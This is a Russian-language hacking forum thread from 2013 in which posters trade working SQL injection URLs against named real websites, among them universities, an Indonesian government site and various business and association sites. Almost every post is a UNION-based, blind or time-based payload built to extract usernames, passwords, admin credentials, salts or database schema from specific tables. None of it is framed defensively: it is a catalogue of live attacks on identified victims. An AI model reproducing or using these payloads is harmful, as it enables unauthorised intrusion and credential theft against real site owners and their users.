ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.08.2013, 23:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
ANPED Серверный Устойчивый Альянс
Код:
Code:
http://www.anped.org/index.php?part=-112%27+union+select+1,2,3,4,5,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28anped.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,7,8,9,10+--+
|
|
|
|
24.08.2013, 15:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
pr=8
Сообщение от None
http://
www3.bkpm.go.id
/mobile/content/general.php?m=-2'+union+all+select+1,2,3,concat_ws(0x3a,salt,user name,password),5,6,7,8,9,10,11+from users --+
Сообщение от None
http://
phd.dii.unisi.it
/general/general.php?id=-4+union+all+select+1,2,concat_ws(0x3e,version(),da tabase(),user()),4,5 --+
Сообщение от None
http://
www.drinksontario.com
/memberinfo.php?id=-70+union+all+select+1,2,3,concat(version(),0x3a,da tabase(),0x3a,user()),5,6,7,8,9,10,11,12 --+
|
|
|
|
24.08.2013, 21:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Код:
Code:
http://www.hkyongnuo.com/e-detail.php?ID=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+--+
Харьковский Национальный Университет им. В.Н.Каразина
Код:
Code:
http://www.univer.kharkov.ua/en/general/univer_today/photos?cat=-411+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+&year=2666
|
|
|
|
25.08.2013, 09:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
pr=6
Сообщение от None
http://
www.jpkc.hfut.edu.cn
/2007/szlj/memberInfo.php?id=-1'+union+all+select+1,2,3,(select(@x)from(select (@x:=0x00),(select(0)from(szlj.user)where(0x00)in( @x:=concat(@x,0x3c62723e,name,0x3a,psw))))antichat ) --+
Сообщение от None
http://
www.graphene-flagship.eu
/GFreg/MemberInfo.php?member=534+union(select +1,2,3,(select(@x)from(select (@x:=0x00),(select(0)from(phantoms_membersGF.tblUs ers)where(0x00)in(@x:=concat(@x,0x3c62723e,login, 0x3a,password))))antichat),5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28) --+
Сообщение от None
http://
www.0931mmjy.com
/MemberInfo.php?id=-58+union+select+1,2,group_concat(0x3a,name,pwd),4, 5,6,7,8,9,10 from tb_user --+
|
|
|
|
26.08.2013, 00:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
http://bolshevik-bowling.com.ua/info.php?id=-2+union+select+1,2,@@version
|
|
|
|
26.08.2013, 18:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Интересная находка (по крайней мере, для меня )
Нашел инъекцию на http://www.gfvastgoed.be/detail.php?id=840868.
Как blind,все крутится:
Сообщение от None
http://
www.gfvastgoed.be
/detail.php?id=840868+and substring(version(),1,1)=5+--+
Подбираем количество столбцов......их аж 407 |
|
|
|
26.08.2013, 18:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от YaBtr
YaBtr said:
Подбираем количество столбцов......их аж
407
Ололо
Код:
Code:
http://www.gfvastgoed.be/detail.php?id=-1/**/union(select(0),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat(user(),0x3A,database(),0x3A,version(),0x3A),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406)
P.S Блокнотом заменяем все пробелы на ничего.
|
|
|
|
28.08.2013, 10:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
pr=3
Сообщение от None
http://
www.georgiasocietyofhearingprofessionals.com
/pages/memberinfo.php?id=21+and if(substr(version(),1,1)=5,sleep(5),1)
Сообщение от None
http://
www.hkfootwear.org
/en/memberInfo.php?id=-1099+union+select+1,2,concat_ws(0x3a,adminname,adm inpwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29 from tbl_admin --+
Сообщение от None
http://
www.pch-workshop.com
/MemberInfo.php?Id=-12+union+all+select+1,2,(select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4 --+
|
|
|
|
28.08.2013, 16:00
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
http://www.pie-mag.com/no_cache/event-details.html?event_id=59+and+1=0+union+select+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71, 72,73,74,75,76,77,78,79+--+
|
|
|
29.08.2013, 11:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от None
http://
www.actradingpost.com
/trade.php?ID=413+and+1=2+union+select+1,2,3,4,(sel ect(@x)from(select (@x:=0x00),(select(0)from(ACTradingPost.Profile)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,name,0x3a,pas sword))))antichat),6 --+
Сообщение от None
http://
www.bwjava.com
/tools-of-the-trade.php?id=90'+and+(substr(version(),1,1)=5)+and +'1
Сообщение от None
http://
www.somerikko.net
/collection/trade.php?id=2222+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5 --+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
